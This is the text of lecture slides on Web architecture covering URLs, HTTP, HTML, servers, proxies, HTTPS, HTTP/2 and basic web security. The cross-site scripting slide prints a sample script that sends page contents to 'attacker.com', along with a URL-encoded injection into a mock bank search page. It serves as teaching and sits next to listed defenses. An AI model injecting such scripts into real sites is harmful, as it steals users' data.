The Web seems an “evident” extension
of the Internet.
What is so special about
the invention of the Web?
This flyer predates the Web’s boom.
What is missing?
The Web actually consists of
3 separate—but connected—inventions.
The Web actually consists of
3 separate—but connected—inventions.
A URL uniquely identifies a resource.
HTTP allows us to retrieve a representation
of a resource through a URL.
HyperText Transfer Protocol
An HTML document can represent a resource,
and link to other resources through their URL.
HyperText Markup Language
A Web URL uniquely identifies and locates
a resource anywhere in the universe.
A string is a unique identifier if
at most one entity corresponds to it.
A national number uniquely identifies a person,
but does not allow locating him or her.
A string is a unique locator if
at most one location corresponds to it.
A street address uniquely identifies a location,
but does not allow to identify a specific person.
A (well-chosen) URL combines
identification and location.
http://en.wikipedia.org/wiki/Susan_Wojcicki
This URL identifies the current Wikipedia article
about Susan Wojcicki.
It does not (also) identify Susan herself.
Otherwise, it wouldn’t be unique anymore.
At the same time, this URL allows us to locate
the Wikipedia article about Susan Wojcicki.
Again, not Susan herself—nor anything else.
Deceptively simple, the URL is probably
the most revolutionary part of the Web.
The flyer we saw earlier shows
what a lack of unique location means.
publisher-specific download instructions
machine-dependent execution
Unique identification partially existed,
but not yet globally for documents.
e-mail address and server names are global
document names are server-specific
The generic URL syntax
extends beyond the Web.
<scheme>:<scheme-specific-part>
The uniform structure of an HTTP URL
includes the following parts.
http://<host>/<path>?<search>#<fragment>
hostname
identifies the machine
path
identifies the resource within the machine
search
optionally refines the resource
fragment
optionally identifies a part of the resource
The uniform structure of an HTTP URL
includes the following parts.
http://en.wikipedia.org/wiki/Susan_Wojcicki#Career
hostname
the machine is en.wikipedia.org
path
the resource is /wiki/Susan_Wojcicki
search
not present
fragment
the part of the resource is Career
An HTTP URL provides the instructions
to obtain a representation of the resource.
http://<host>/<path>?<search>#<fragment>
The client looks up one of the host’s IP addresses.
The client uses DNS for this.
The client requests /<path>?<search>
.
The server generates a response in a server-specific way.
The client finds #<fragment>
.
Fragments are defined by the representation format.
An HTTP URL provides the instructions
to obtain a representation of the resource.
http://en.wikipedia.org/wiki/Susan_Wojcicki#Career
The client looks up an IP address of en.wikipedia.org .
One such address is 91.198.174.192 .
The client requests /wiki/Susan_Wojcicki .
The server generates the corresponding Wikipedia article.
The client finds #Career .
This corresponds to a header in the HTML document.
The URL became part of a family
of technologies related to identification.
URL – Uniform Resource Locator (RFC1738 )
unique identification and location of resources
mailto:ruben.verborgh@ugent.be
URN – Uniform Resource Name (RFC2141 )
location-independent resource identifier
urn:isbn:1783303018
URI – Uniform Resource Identifier (RFC3986 )
The broadest family is IRI,
which supports non-ASCII characters.
Not all characters are allowed in a URI.
IRI – Internationalized Resource Identifier (RFC3987 )
Non-ASCII chars don’t need to be encoded.
Chars with other meaning still need encoding.
http://🏹.to/🗽🕐
HTTP is a protocol to transfer representations
from a server to a client.
HTTP standardizes how clients send a request
for a representation
of a resource through its URL.
HTTP standardizes how servers reply with a response
that can contain a representation.
The most widely used version
is HTTP/2 .
with protocol details available at
After resolving the server’s IP address,
the client can send an HTTP request.
After resolving the server’s IP address,
the client can send an HTTP request.
To obtain http://en.wikipedia.org/wiki/Susan_Wojcicki ,
the client connects to 91.198.174.192 on TCP port 80,
and sends this request:
GET /wiki/Susan_Wojcicki HTTP/1.1
Host: en.wikipedia.org
User-Agent: MyBrowser/1.0
Accept: text/html
HTTP has a limited number of methods.
The following 5 are widely known.
GET
transfer a representation
HEAD
transfer only status and headers
POST
perform a resource-specific operation
PUT
replace all representations
DELETE
remove all representations
An HTTP method is safe
if it is read-only.
The client does not request
a state change of the resource.
The server can still change something,
but the client is not “accountable”.
Safe methods include GET
and HEAD
.
Automated clients cannot cause harm with these.
Servers not respecting this contract act dangerously.
An HTTP method is idempotent
if repetitions don’t alter the outcome.
The client can execute an idempotent request
1 or more times; the result remains the same.
If a request (maybe) failed, just try it again.
Idempotent methods include all safe methods,
as well as PUT
and DELETE
.
Deleting something multiple times
is the same as deleting it once.
Repeating other methods might be undesired.
Clients send the hostname,
so one server can host multiple websites.
Although the client resolves it to an IP address,
the hostname is still sent to the server.
There is no one-to-one mapping
between server IP addresses and domains.
One website can be hosted by multiple servers .
Multiple DNS entries exist for a hostname.
One server can host multiple websites .
The Host
header tells the server which one to pick.
When a server receives a request,
it generates a response.
The response starts with a status line .
The response can contain header fields .
The response can optionally contain a body .
depending on status code
contains the actual document contents
When a server receives a request,
it generates a response.
In response to our previous request :
HTTP/1.1 200 OK
Date: Wed, 18 Feb 2016 09:30:46 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 24 Jan 2016 18:26:27 GMT
<!DOCTYPE html>
<html lang="en" dir="ltr" class="client-nojs">
…
HTTP has 5 categories of status codes
to indicate how the request was handled.
100–199
info – the client may continue
200–299
success – request understood & accepted
300–399
redirection – further action is needed
400–499
client error – the request cannot be fulfilled
500–599
server error – the server failed to fulfill
A couple of these status codes
are very commonly encountered.
200
OK
(“default”)
301
Moved Permanently
404
Not Found
500
Internal Server Error
HTTP has 5 categories of status codes
to indicate how the request was handled.
HTML is a markup language that
captures the structure of documents.
HTML divides a document into elements ,
which are indicated by opening and closing tags .
Tags begin with “<
” and end with “>
”.
(Regular) closing tags begin with “</
”.
Self-closing tags end with “/>
”.
Opening tags can have key/value attributes.
The key name is followed by “=
” and its value.
The value is usually surrounded by (single/double) quotes.
The HTML specification restricts
what elements can be used and where.
A few dozen tags
exist for different element types.
They have rules for what attributes they can have,
and what child elements they can/should have.
There are three main parts:
<html>
for the entire document
<head>
for document metadata
<body>
for document contents
HTML documents can embed or use
other media documents.
Embed images, audio, and video.
Use style sheets , fonts ,
and scripts .
<link rel="stylesheet">
<script>
Embed other pages (instead of linking to them).
HTML is intended for markup ,
not for makeup .
HTML elements focus on structure…
<h2>The <em>new</em> section</h2>
…not on aesthetics.
<font size="5">
<b>The <i>new</i> section</b>
</font><br/>
Makeup -only elements were removed from HTML5.
The Web supports an immense variety
of different clients.
All clients need to support
a couple of core technologies.
networking technologies
the HTTP protocol
many libraries exist
often combined with networking support
one or more representation formats
not necessarily (only) HTML
Browsers offer an interactive environment
for general-purpose website consumption.
They render HTML elements as interactive controls.
They typically support styles, media, and scripts.
Standards ensure consistency (mostly) .
The main differences are features and preferences.
operating system
performance
extensions
Web applications perform HTTP requests
using browser scripting functionality.
A script on a webpage can make HTTP requests.
The server typically returns JSON or XML responses,
which the script then transforms.
Alternatively, the server could return HTML ,
for instance, to update parts of the page.
Scripts can be triggered automatically
or through user actions.
clicking a button or link
pressing a key (autocompletion)
Desktop and mobile applications
can similarly create HTTP requests.
They use their own infrastructure,
as they don’t have the browser’s.
In particular, they usually don’t set cookies.
They typically request JSON (or XML ),
but HTML is not uncommon.
HTML can be used to render partial views.
Is there a real need then for a native app?
Crawlers process and/or index webpages,
and follow links to others.
Crawlers extract, process, and index text contents.
They also analyze (some) structured annotations.
Using links, they discover other pages.
The HTTP protocol does not attach
meaning to URL paths and query strings.
Even though you might attach meaning to a URL like
https://example.org/products/guitars.html?brand=gibson ,
such an interpretation is not specified.
In particular, slashes do not necessarily indicate folders;
a dot does not necessarily signal an extension.
The server might just have used this URL instead:
https://example.org/products-guitars?html%2Fbrand.gibson
and it might very well point to an image.
Web servers exist in many kinds and
have many possible implementations.
A static file server maps HTTP URLs
to internal file URLs.
A config file usually assigns a root folder per domain.
https://example.org/images/products/guitar.jpg
could map to /var/www/example.org/images/products/guitar.jpg
Folders map to possible index files.
https://example.org/images/products/
could map to /var/www/example.org/images/products/index.html
Custom permissions and rules can be set.
An application server uses server-side code
to generate pages on demand.
The request is parsed by an application framework,
which exposes the URL, method, and headers.
Implementors can react to specific URLs or patterns,
typically generating responses using templates.
Many languages and frameworks exist.
languages:
Java
PHP
JavaScript
Ruby
C#
…
frameworks:
Spring MVC
Ruby on Rails
ASP.NET
…
Several intermediaries may exist
between a client and a server.
In contrast to many other protocols,
HTTP enables transparent intermediaries.
This is not as easy with other protocols.
For example, let’s assume Java RMI.
remoteObject.getMessage(234);
remoteObject.getMessage(234);
remoteObject.deleteMessage(234);
If a proxy server is inserted before the remote server,
may it cache the result of getMessage
?
If so, how long?
HTTP can be transparent because of
its standardized uniform interface.
Caching
is possible with headers such as
Cache-Control
and
ETag
.
Cache-Control: max-age=3600
ETag: UniqueHash456
The intermediary fetches the requested item
and keeps it in cache until it expires.
Repeated requests for the item
are served from cache.
The standardized method semantics
are crucial to make caching work.
Repeated GET
requests can be cached,
because GET
is safe.
The client did not ask for changes,
so the server should perform none.
Since nothing changes, we can bypass the server.
If POST
or PUT
are used on a resource,
a subsequent GET
must not be read from cache.
POST
or PUT
are not safe and may change things.
(Repeated identical PUT
requests can be ignored though.)
Depending on their position the network,
proxies are forward or reverse .
(forward) proxy
in the network of the client
typically used for caching
possibly for security/anonymity purposes
reverse proxy
in the network of the server
typically used for caching
also for routing, hiding/abstracting remote architecture
A device can listen on only one TCP port 80.
A reverse proxy lets it run many servers.
What if we need to serve static and dynamic files?
What if we want to combine application servers?
Only one application can listen to a given TCP port.
Configure servers to run on internal ports
(such as 3000, 4000, 5000) instead of port 80.
Run a reverse proxy
(NGINX ,
Apache ,
…)
on port 80,
which dispatches requests to the other servers.
Route requests based on Host
header and/or path.
The proxy interfaces with app servers
through other, non-public TCP ports.
Caching can happen virtually anywhere—
and we don’t always know.
The notion of “client” and “server”
is relative to the interaction.
HTTP nodes send plaintext over TCP,
which means intermediaries can read it.
The privacy of your requests is not guaranteed.
The privacy of server responses is not guaranteed.
The integrity of server responses is not guaranteed.
The Web needs to be a safe
and trusted environment for all.
HTTP poses a major threat
for sensitive applications.
banking
payment
medical records
webmail
…
It’s hard to define what is sensitive .
Can others see what Wikipedia articles you read?
HTTPS is a secure extension
of the HTTP protocol.
HTTPS can be applied in
different parts of the network.
Consider the common use case in which
an application server lives behind a reverse proxy .
Only the proxy could use HTTPS.
Typically, server and proxy operate in a trusted network.
Client–proxy communications are secured.
The server and the proxy could use HTTPS.
These are two different encrypted communications.
No proxy can sit “in between” an encrypted communication.
Setting up HTTPS involves requesting,
installing, and maintaining a certificate.
Request SSL certificate from a certificate authority .
This certificate is valid for one or more hostnames.
Let's Encrypt provides free certificates for all.
Configure your Web server with the certificate.
private key stored safely
public key shared with clients
When the certificate expires, request a new one.
HTTPS URLs are different,
so clients know what protocol to use.
HTTP URLs start with http:
HTTPS URLs start with https:
After HTTPS has been configured,
server admins typically set up redirects.
Never break existing URLs!
The connection between two URLs differing only
in http
/https
is not universally defined.
They could be different things.
Most browsers indicate HTTPS in the address bar.
Several browser vendors campaigned
to have an all-HTTPS Web.
The Web has been pushing HTTP’s limits,
so an update was due.
The Web has different demands nowadays
than those initially envisaged.
HTTP/2 is an update of the HTTP protocol
that addresses a couple of key bottlenecks.
This section is based on http2 explained
by Daniel Stenberg ,
creator of curl .
Webpages consist of more and more items
that increasingly become larger.
The HTTP Archive
saw median total page transfer sizes increase
from 0.5MB in 2010 to 2MB in 2022.
The median page consist of 69 objects.
Several limitations of HTTP have
a negative impact on page load times.
Many websites use(d) workarounds
to circumvent HTTP’s limitations.
inlining
Embed scripts, images, and/or styles
inside HTML documents instead of linking them
to reduce the number of items.
concatenation
Combine several scripts, images, or styles
into a single file.
sharding
Distribute resources across different domains
to bypass connection restrictions.
HTTP/2 set out a couple of
important goals for improvement.
Reduce sensitivity to latency.
Eliminate the need for multiple connections.
Fix HTTP pipelining and line blocking.
Maintain interfaces, content, and URLs.
Be backward compatible for HTTP 1.1 clients.
HTTP/2 is a binary protocol that sends
frames over multiplexed streams.
Switching to binary makes framing easier.
10 types of frames
HEADERS
frame for HTTP headers
DATA
for request and response payloads
Multiplexing ensures objects don’t block each other.
Frames from many streams flow over the same connection.
Additional compression reduces overhead.
HTTP’s stateless nature implies repetition.
HTTP/2 always goes over TLS in practice,
even though the standard also allows TCP.
With regular TCP on port 80, clients would
need to upgrade from HTTP 1.x to HTTP/2.
overhead necessary for backward compatibility
With TLS, Application-Layer Protocol Negotiation
is embedded within the TLS handshake.
no protocol selection latency
Firefox and Chrome will only support TLS.
https:
everywhere in the future
Protocol-level security is insufficient
to provide application-level security.
Protocol-level security only guarantees privacy and integrity
from one endpoint to another.
The Web evolved from a document system
to a distributed application platform.
Applications themselves also need
mechanisms to secure information.
With code injection, clients send input
designed to execute on the server.
attack
executable code passed in a URL or POST
body parameter
cause
improper input validation by the server
defense
never trust raw client input
validate input ranges
escape values before passing to scripts
Client-side validation only offers usability;
servers always need to (re-)validate.
Client-side form
role
admin
user
developer
Ways to bypass
change the HTML at runtime
construct the HTTP request in another way
Client-side-only validation in the real world
VIDEO
With Cross-Site Scripting (XSS), a client-side script
steals information from a webpage.
attack
trick another site into executing code in its own space,
exposing or changing user data
causes
improper input validation
trusting third-party content
social engineering
defense
validate input
add token field on forms
Injecting JavaScript in pages
can steal a user’s personal data.
Original page echoes assets
in contents
https://mybank.com/onlinebanking/?search=assets
Attack code
(xhr = new XMLHttpRequest()).open('GET',
'https://attacker.com/?data=' + document.body.innerHTML);
xhr.send(null);
Modified URL echoes the attack code in contents
https://mybank.com/onlinebanking/?search=%3Cscript%3E(xhr%20%3D%20new
With cross-origin access, a page requests
third-party resources through JavaScript.
attack
request resources from another site with JavaScript and read their contents
causes
the existence of XMLHttpRequest
being logged in on another website
defense
browsers block cross-origin requests by default
Cross-origin requests are a problem
within browsers only.
Nothing happens when any other script or app
requests https://mybank.com/onlinebanking/
.
You are not logged in—there are no cookies.
When the browser requests that page,
the page might contain personal information.
You might be logged in—browsers maintain cookies.
As a result, browsers block cross-origin requests.
an origin more or less corresponds to a domain
Activate CORS to enable Web APIs access
from within other browser-based Web applications.
The browser adds an Origin
header to requests.
If the server allows requests from that origin,
it adds Access-Control-Allow-Origin
.
Access-Control-Allow-Origin: https://my.site
Users spend most of their time on other sites.
This means that users prefer your site to work the same way as all the other sites they already know.
Jakob Nielsen